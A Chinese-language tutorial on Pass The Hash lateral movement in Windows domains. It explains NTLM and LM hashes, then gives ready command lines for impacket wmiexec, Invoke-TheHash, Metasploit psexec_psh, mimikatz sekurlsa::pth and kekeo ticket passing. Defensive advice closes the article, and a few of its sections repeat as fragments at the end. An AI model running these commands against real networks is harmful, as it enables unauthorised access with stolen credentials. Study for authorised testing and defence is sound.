域渗透——Pass The Hash 实现技术详解<\/h1>

0x00 概述<\/h2>
Pass The Hash (PTH) 是一种在Windows域环境中利用NTLM哈希进行身份验证的技术，无需破解明文密码即可实现横向移动。本文将全面介绍PTH的原理、实现方法及相关工具。<\/p>

0x01 PTH原理详解<\/h2>

NTLM认证机制<\/h3>

Windows系统通常使用NTLM身份认证<\/li>
NTLM认证不使用明文口令，而是使用口令加密后的hash值<\/li>

hash值由系统API生成（如LsaLogonUser）<\/li> <\/ul>

Hash类型<\/h3>

LM hash<\/strong>：较老的哈希算法，安全性低

密码长度>15时无法生成LM hash<\/li>
从Windows Vista\/Server 2008开始默认禁用<\/li> <\/ul> <\/li>
NT hash<\/strong>：更安全的哈希算法，目前主要使用<\/li> <\/ul>
PTH本质<\/h3>
攻击者获取hash后，在身份验证时直接使用该hash模拟用户，跳过系统API生成hash的过程。<\/p>
启用LM hash方法（Windows Server 2008）<\/h3>
gpedit.msc → 计算机配置 → Windows设置 → 安全设置 → 本地策略 → 安全选项找到"网络安全：不要在下次更改密码存储LAN管理器的哈希值"，选择"已禁用" 系统下次更改密码后即可导出LM hash <\/code><\/pre> 0x02 常用PTH工具<\/h2> Kali Linux工具<\/h3> Metasploit<\/strong><\/li> <\/ol> use exploit\/windows\/smb\/psexec_psh <\/span><\/span><\/code><\/pre> 密码攻击工具集<\/strong> 位于"密码攻击 → Passing the Hash"分类下，包含多种利用工具<\/li> <\/ol> Windows工具<\/h3> 1. Python工具<\/h4> wmiexec.py<\/strong> 项目地址：https:\/\/github.com\/CoreSecurity\/impacket<\/li> EXE版本：https:\/\/github.com\/maaaaz\/impacket-examples-windows<\/li> 参数格式： wmiexec -hashes LMHASH:NTHASH DOMAIN\/user@IP "command"<\/span> <\/span><\/span><\/code><\/pre><\/li> 示例： wmiexec -hashes 00000000000000000000000000000000:7ECFFFF0C3548187607A14BAD0F88BB1 TEST\/test1@192.168.1.1 "whoami"<\/span> <\/span><\/span><\/code><\/pre><\/li> 注：LMHASH可为任意值（当系统不支持LM hash时）<\/li> <\/ul> <\/li> <\/ul> 2. PowerShell工具<\/h4> Invoke-TheHash<\/strong><\/p> 项目地址：https:\/\/github.com\/Kevin-Robertson\/Invoke-TheHash<\/li> 包含多种执行方式：<\/li> <\/ul> a. Invoke-WMIExec<\/strong><\/p> Invoke-WMIExec -Target 192.168.1.1 -Domain test.local -Username test1 -Hash 7ECFFFF0C3548187607A14BAD0F88BB1 -Command "calc.exe"<\/span> -verbose <\/span><\/span><\/code><\/pre>类似wmiexec.py的实现<\/p> b. Invoke-SMBExec<\/strong><\/p> Invoke-SMBExec -Target 192.168.0.2 -Domain test.local -Username test1 -Hash 7ECFFFF0C3548187607A14BAD0F88BB1 -Command "calc.exe"<\/span> -verbose <\/span><\/span><\/code><\/pre>特点：<\/p> 支持SMB1, SMB2 (2.1)和SMB签名<\/li> 通过创建服务执行命令，权限为SYSTEM<\/li> <\/ul> c. Invoke-SMBClient<\/strong> 适用于仅有SMB文件共享权限的情况，支持：<\/p> 列举目录<\/li> 上传\/下载文件<\/li> 删除文件（权限取决于hash对应账户的权限）<\/li> <\/ul> <\/li> <\/ul> 3. Mimikatz工具<\/h4> a. Pass-The-Hash（实际为Overpass-the-hash）<\/strong><\/p> privilege::debug <\/span><\/span>sekurlsa::pth \/user:test1 \/domain:test.local \/ntlm:7ECFFFF0C3548187607A14BAD0F88BB1 <\/span><\/span><\/code><\/pre>要求：本地管理员权限（需访问lsass.exe进程）<\/p> b. Pass-The-Ticket<\/strong> 适用于非管理员权限场景，需配合kekeo使用：<\/p> kekeo下载：https:\/\/github.com\/gentilkiwi\/kekeo<\/li> <\/ul> 步骤：<\/p> 生成票据：<\/li> <\/ol> kekeo "tgt::ask \/user:test1 \/domain:test.local \/ntlm:7ECFFFF0C3548187607A14BAD0F88BB1"<\/span> <\/span><\/span><\/code><\/pre>生成文件：TGT_test1@TEST.LOCAL_krbtgt~test.local@TEST.LOCAL.kirbi<\/code><\/p> 导入票据：<\/li> <\/ol> kekeo "kerberos::ptt TGT_test1@TEST.LOCAL_krbtgt~test.local@TEST.LOCAL.kirbi"<\/span> <\/span><\/span><\/code><\/pre>0x03 防御建议<\/h2> 限制特权账户使用<\/strong>：<\/p> 避免域管理员账户用于日常操作<\/li> 实施最小权限原则<\/li> <\/ul> <\/li> 补丁管理<\/strong>：<\/p> 安装kb2871997等安全补丁<\/li> 但注意：kb2871997仅限制本地账户的PTH，不影响域账户<\/li> <\/ul> <\/li> 监控与检测<\/strong>：<\/p> 监控异常的身份验证尝试<\/li> 检测LSASS进程的异常访问<\/li> <\/ul> <\/li> 安全配置<\/strong>：<\/p> 禁用LM hash存储<\/li> 启用SMB签名<\/li> 限制WMI和SMB的访问权限<\/li> <\/ul> <\/li> 凭证保护<\/strong>：<\/p> 使用Credential Guard（Windows 10\/Server 2016+）<\/li> 实施LSA保护<\/li> <\/ul> <\/li> <\/ol> 0x04 总结<\/h2> Pass The Hash是域渗透中极为有效的横向移动技术，攻击者无需破解明文密码即可利用哈希值进行身份验证。本文详细介绍了PTH的原理、多种实现工具及防御措施，为安全研究人员提供了全面的技术参考。在实际渗透测试或安全评估中，理解这些技术有助于更好地评估和加固域环境的安全性。<\/p>

域渗透——Pass The Hash 实现技术详解<\/h1>

0x00 概述<\/h2> Pass The Hash (PTH) 是一种在Windows域环境中利用NTLM哈希进行身份验证的技术，无需破解明文密码即可实现横向移动。本文将全面介绍PTH的原理、实现方法及相关工具。<\/p>

0x01 PTH原理详解<\/h2>

PTH本质<\/h3> 攻击者获取hash后，在身份验证时直接使用该hash模拟用户，跳过系统API生成hash的过程。<\/p>

0x02 常用PTH工具<\/h2>

Windows工具<\/h3>

0x00 概述<\/h2>
Pass The Hash (PTH) 是一种在Windows域环境中利用NTLM哈希进行身份验证的技术，无需破解明文密码即可实现横向移动。本文将全面介绍PTH的原理、实现方法及相关工具。<\/p>

PTH本质<\/h3>
攻击者获取hash后，在身份验证时直接使用该hash模拟用户，跳过系统API生成hash的过程。<\/p>